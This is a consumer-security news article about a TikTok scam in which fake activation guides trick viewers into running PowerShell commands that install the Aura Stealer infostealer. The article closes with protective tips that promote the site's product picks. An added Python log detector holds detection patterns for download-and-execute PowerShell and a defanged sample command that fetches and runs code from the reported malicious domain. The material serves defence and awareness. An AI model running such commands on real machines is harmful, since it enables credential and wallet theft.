TikTok Malware Scam Uses Fake Software Activation Guides to Steal Data

Cybercriminals are once again turning TikTok into a trap for unsuspecting users. This time, they disguise malicious downloads as free activation guides for popular software like Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.

Security expert Xavier Mertens was the first to spot the campaign, confirming that the same type of scheme was seen earlier this year. According to BleepingComputer, these fake TikTok videos display short PowerShell commands and ask viewers to run them as administrators to “enable” or “fix” their programs.

In reality, these commands connect to a malicious website and pull down malware known as Aura Stealer, which silently siphons passwords, cookies, cryptocurrency wallets, and authentication tokens saved on the victim’s computer.

Cybercriminals are using fake TikTok videos to trick users into downloading malware disguised as free activation guides. (Kurt “CyberGuy” Knutsson)

How the TikTok Scam Works

This campaign uses what experts call a ClickFix attack. This is a social engineering trick that makes victims believe they are following legitimate technical instructions. The instructions seem simple and quick: run a short command and get instant access to the premium software.

But instead of activating anything, the PowerShell command connects to a remote domain named slmgr[.]win, which downloads harmful executables from Cloudflare-hosted pages. The main file, updater.exe, is a variant of the Aura Stealer malware. Once inside the system, it searches for your credentials and sends them to the attacker.

Another file, source.exe, uses Microsoft’s C# compiler to run code directly in memory, making it even harder to detect. The purpose of this additional payload is not yet fully known, but the pattern follows previous malware used for crypto theft and ransomware distribution.
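For defenders, the behaviour described above maps to two log signals: a PowerShell command that both downloads and executes content (or names the reported domain), and the C# compiler launched by a parent that is not a build tool. The following is an added example, not code from the original article or the researchers it cites; the event field names, the build-tool allowlist and the sample events are assumptions constructed for illustration.

```python
import re

# Domain as printed in the article (defanged); refanged only in memory for matching.
IOC_DOMAINS = {"slmgr[.]win".replace("[.]", ".")}
# Assumed allowlist of legitimate parents of the C# compiler (csc.exe).
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe"}

DOWNLOAD = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
HOST = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)

def refang(text):
    """Undo common defanging so hostnames can be compared."""
    return text.replace("[.]", ".").replace("hxxp", "http")

def classify(command):
    """Return sorted findings for one logged PowerShell command."""
    cmd = refang(command)
    findings = set()
    if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
        findings.add("download-and-execute")
    hosts = {h.lower() for h in HOST.findall(cmd)}
    if any(h == d or h.endswith("." + d) for h in hosts for d in IOC_DOMAINS):
        findings.add("known-bad-domain")
    return sorted(findings)

def unexpected_compiler(event):
    """True when csc.exe is started by a parent outside the allowlist."""
    return (event["image"].lower() == "csc.exe"
            and event["parent"].lower() not in BUILD_PARENTS)

def scan(events):
    """Return (index, findings) for every event that raises a finding."""
    alerts = []
    for i, ev in enumerate(events):
        if ev["type"] == "scriptblock":
            hits = classify(ev["text"])
        else:
            hits = ["csc-unexpected-parent"] if unexpected_compiler(ev) else []
        if hits:
            alerts.append((i, hits))
    return alerts

# Constructed sample events; "<path>" is a placeholder, not a real URL path.
SAMPLE_EVENTS = [
    {"type": "scriptblock", "text": "iex (irm hxxps://slmgr[.]win/<path>)"},
    {"type": "scriptblock", "text": "Get-ChildItem C:\\Users | Measure-Object"},
    {"type": "scriptblock", "text": "irm https://example.invalid/api | ConvertFrom-Json"},
    {"type": "process", "parent": "source.exe", "image": "csc.exe"},
    {"type": "process", "parent": "MSBuild.exe", "image": "csc.exe"},
]
```

Calling `scan(SAMPLE_EVENTS)` flags only the first and fourth events; the plain API call and the MSBuild-driven compile pass without an alert.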

These short “activation” commands covertly connect to malicious servers that install information-stealing malware like Aura Stealer. (Kurt “CyberGuy” Knutsson)

How to protect yourself from TikTok malware scams

Even though these scams seem convincing, you can avoid becoming a victim by taking proper precautions.

1) Avoid shortcuts

Never copy or run PowerShell commands from TikTok videos or random websites. If something promises free access to premium software, it’s probably a trap.

2) Use trusted sources

Always download or activate the software directly from the official website or through legitimate app stores.

3) Keep security tools up to date

Outdated antivirus software or browsers cannot detect the latest threats. Update your software regularly to stay protected.

4) Use powerful antivirus software

Install powerful antivirus software that offers real-time scanning and protection against Trojans, information stealers and phishing attempts.

The best way to protect yourself from malicious links that install malware, potentially accessing your private information, is to install powerful antivirus software on all your devices. This protection can also alert you to phishing emails and ransomware scams, protecting your personal information and digital assets.

Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android, and iOS devices at Cyberguy.com

5) Sign up for a data deletion service

If your personal data ends up on the dark web, a data removal or monitoring service can alert you and help you remove sensitive information.

Although no service can guarantee the complete removal of your data from the Internet, a data deletion service is definitely a wise choice. They’re not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information across hundreds of websites. This is what gives me peace of mind and has proven to be the most effective way to erase your personal data from the Internet. By limiting the information available, you reduce the risk of fraudsters cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

Check out my top picks for data deletion services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com

6) Reset credentials

If you’ve ever followed suspicious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately.

7) Reset passwords

Start with your email, financial, and social media accounts. Use unique passwords for each site. Consider using a password manager, which securely stores and generates complex passwords, reducing the risk of password reuse.

Next, check to see if your email has been exposed in past breaches. Our #1 password manager pick (see Cyberguy.com) includes a built-in breach scanner that checks if your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

Discover the Best Expert-Rated Password Managers of 2025 at Cyberguy.com

8) Enable multi-factor authentication

Add an extra layer of security by enabling multi-factor authentication wherever possible. Even if your passwords are stolen, attackers will not be able to log in without your verification.

If you followed suspicious steps, change your passwords, enable two-factor authentication, and stay alert for future scams. (Getty Images)

Kurt’s Key Takeaways

TikTok’s global reach makes it a prime target for scams like this. What looks like a useful hack could end up costing you your security, money, and peace of mind. Stay vigilant, trust only verified sources and remember that there is no free activation shortcut.

Is TikTok doing enough to protect its users from scams like this? Let us know by writing to us at Cyberguy.com

Copyright 2025 CyberGuy.com. All rights reserved.
